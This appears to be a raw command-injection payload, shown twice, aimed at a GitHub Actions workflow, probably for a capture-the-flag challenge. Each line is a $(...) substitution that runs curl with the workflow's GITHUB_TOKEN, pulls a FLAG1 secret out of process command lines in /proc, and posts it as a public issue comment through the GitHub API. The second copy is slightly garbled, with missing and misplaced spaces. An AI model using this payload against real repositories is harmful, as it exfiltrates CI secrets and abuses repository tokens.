$(curl -s -X POST -H "Authorization: Bearer $GITHUB_TOKEN" -H "Content-Type: application/json" -d "{"body":"$(cat /proc//cmdline | tr '\0' '_' | grep -o 'FLAG1=[^_]' | cut -d= -f2)"}" https://api.github.com/repos/$GITHUB_REPOSITORY/issues/${{github.event.issue.number}}/comments)
$(curl -s -X POST -H "Authorization: Bearer$GITHUB_TOKEN" -H "Content-Type: application/json" -d "{"body":"$ (cat /proc//cmdline | tr '\0' '_' | grep -o 'FLAG1=[^_]' | cut -d= -f2)"}" https://api.github.com/repos/$GITHUB_REPOSITORY/issues/${{github.event.issue.number}}/comments)